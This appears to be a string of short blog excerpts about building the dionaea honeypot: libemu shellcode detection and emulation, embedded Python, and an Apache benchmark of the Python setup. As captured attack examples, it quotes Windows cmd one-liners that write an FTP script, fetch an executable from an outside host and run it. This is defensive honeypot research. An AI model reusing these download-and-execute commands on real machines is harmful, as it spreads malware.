We got a new milestone due:
stream recording works
shellcode detection using libemu works
shellcode emulation using libemu works
compiles on linux&openbsd
An exploit taken from a public repository, run against the software, is detected and emulated.
To shorten things, basically all required points are hit with current svn.
So, given the time we just saved, some words about how it works.
The core functionality in dionaea is written in c, but python is embedded as scripting language and required parts of the c-api are exported to the embedded python, using cython bindings.
Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:
WinExec(“cmd /c echo open 188.8.131.52 4871 > o&echo user 1 1 » o &echo get msq16.exe » o”)
As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.
I did not expect downloading the malware getting a problem, as all information required was available, including host credentials and filename.
While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.
cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe The offer to download something was not that unexpected, we are working hard to get these offers, so we can grab copies of something, but the location was interesting.
due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as uniq abbrevitation. Things are rolling for the project, writing code started, a basic homepage with instructions how to compile/use it was created.
I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.
As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The ’testsuite’ is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page.
2.6.2_(release26-maint,_Apr_19_2009,_02:15:38) 3.0.1+_(r301:69556,_Apr_15_2009,_17:22:45)_ 3.1a1+_(py3k,_Mar_30_2009,_02:02:26)_ To benchmark, I ran the apache benchmark tool ab
ab -n 100000 -c 15 http://localhost:8080/bar